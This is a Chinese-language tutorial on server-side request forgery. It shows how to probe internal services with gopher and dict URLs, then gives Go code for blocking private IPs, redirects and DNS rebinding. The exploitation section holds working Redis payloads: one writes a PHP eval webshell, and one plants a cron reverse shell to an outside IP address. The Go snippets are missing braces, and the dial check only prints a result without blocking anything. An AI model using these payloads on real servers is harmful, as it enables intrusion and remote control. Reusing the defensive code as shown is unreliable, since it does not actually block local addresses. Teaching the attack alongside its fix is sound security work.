1、SSRF漏洞简介

1.1 漏洞场景

SSRF (Server-Side Request Forgery: 服务端请求伪造) 是一种由攻击者构造形成,由服务端发起请求的一个安全漏洞。攻击者在未能获取服务器权限时,利用存在缺陷的应用作为代理远程攻击内网的服务器。

2、SSRF漏洞检测

2.1 信息收集

2.1.1 web请求

```
curl
gopher://192.168.100.1:80/_GET%20%2F%20HTTP%2F1.1%0D%0AHost%3A%20192.168.100.1%0
D%0AAccept-
Encoding%3A%20gzip%2C%20deflate%0D%0AConnection%3A%20close%0D%0A%0D%0A
```

2.1.2 端口探测

```
curl "dict://172.34.178.16:22/"
```

2.2 Redis漏洞

2.2.1 Redis命令

• Redis秘钥

```
curl "dict://127.0.0.1:6379/auth:''"
```

• Redis键值

```
curl "dict://127.0.0.1:6379/set:flag:123"
curl "dict://127.0.0.1:6379/keys:*"
curl "dict://127.0.0.1:6379/get:flag"
```

2.2.2 Getshell操作

• 直接写webshell

```
dict://127.0.0.1:6379/flushall
dict://127.0.0.1:6379/set:x:'<script:language="php">@eval($_GET["chaos"]);
</script>'
dict://127.0.0.1:6379/config:set:dir:/var/www/html/
dict://127.0.0.1:6379/config:set:dbfilename:test.php
dict://127.0.0.1:6379/save
```

• 主从复制写webshell

```
192.168.8.185:6379> set x '<?php eval($_GET["chaos"]);?>' dict://127.0.0.1:6379/slaveof:192.168.8.185:6379 # 设置主从模式 dict://127.0.0.1:6379/get:x dict://127.0.0.1:6379/config:set:dir:/var/www/html/ dict://127.0.0.1:6379/config:set:dbfilename:test.php dict://127.0.0.1:6379/save dict://127.0.0.1:6379/slaveof:no:one

dict://127.0.0.1:6379/flushall dict://127.0.0.1:6379/set:x:'%5cn%5Cn*%2F1%20*%20*%20*%20bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.33.6.150%2F9999%200%3E%261%5Cn%5Cn' dict://127.0.0.1:6379/config:set:dir:/var/spool/cron/ dict://127.0.0.1:6379/config:set:dbfilename:root dict://127.0.0.1:6379/save
```

3、SSRF漏洞修复

3.1 去除url中的特殊字符

防止url解析差异绕过

3.2 域名内网IP过滤

3.2.1 内网IP判断

```
// IsLocalIP 判断是否是内网ip
func IsLocalIP(ip net.IP) bool {
   if ip == nil {
       return false
   // 判断是否是回环地址, ipv4时是127.0.0.1; ipv6时是::1
   if ip.IsLoopback() {
       return true
   // 判断ipv4是否是内网
   if ip4 := ip.To4(); ip4 != nil {
       return ip4[0] == 10 \mid \mid // 10.0.0.0/8
           (ip4[0] == 172 \&\& ip4[1] >= 16 \&\& ip4[1] <= 31) || // 172.16.0.0/12
           (ip4[0] == 192 \&\& ip4[1] == 168) // 192.168.0.0/16
   // 判断ipv6是否是内网
   if ip16 := ip.To16(); ip16 != nil {
       // 参考 https://tools.ietf.org/html/rfc4193#section-3
https://en.wikipedia.org/wiki/Private_network#Private_IPv6_addresses
       // 判断ipv6唯一本地地址
       return 0xfd == ip16[0]
   // 不是ip直接返回false
   return false
}
```

3.2.2 dns解析ip

```
site := "http://www.test.com"
ourl, err := url.Parse(site)
if err != nil{
    return false
}
ip, err := net.LookupIP(ourl.Hostname())  // dns解析IP
if err != nil{
    return false
}
```

3.3 不要使用URL跳转

检查是否为内网资源是在请求之前发起的,如果攻击者在请求过程中通过URL跳转访问内网则可以绕过第一种防御策略。

```
client := &http.Client{
   CheckRedirect: func(req *http.Request, via []*http.Request) error {
       // 跳转超过10次,也拒绝继续跳转
       if len(via) >= 10 {
           return fmt.Errorf("redirect too much")
       statusCode := req.Response.StatusCode
       if statusCode == 307 || statusCode == 308 {
           // 拒绝307和308跳转访问(此类跳转可以时POST请求,风险极高)
           return fmt.Errorf("unsupport redirect method")
       // 判断ip
       ips, err := net.LookupIP(req.URL.Host)
       if err != nil {
           return err
       for _, ip := range ips {
           if IsLocalIP(ip) {
               return fmt.Errorf("have local ip")
           fmt.Printf("%s -> %s is localip?: %v\n", req.URL, ip.String(),
IsLocalIP(ip))
       return nil
   },
}
```

3.4 将域名转换成IP访问

发起一次HTTP请求需要先请求DNS服务获取域名对应的IP地址,如果攻击者有可控的DNS服务,就可以通过DNS重绑定绕过前面的防御策略。

```
dialer := &net.Dialer{}
dialer.Control = func(network, address string, c syscall.RawConn) error {
    // address 已经是ip:port的格式
    host, _, err := net.SplitHostPort(address)
    if err != nil {
        return err
```

```
}
fmt.Printf("%v is localip?: %v\n", address, IsLocalIP(net.ParseIP(host)))
return nil
}
transport := http.DefaultTransport.(*http.Transport).Clone()
// 使用官方库的实现创建TCP连接
transport.DialContext = dialer.DialContext
// 使用此client请求,可避免DNS重绑定风险
client := &http.Client{
    Transport: transport,
}
```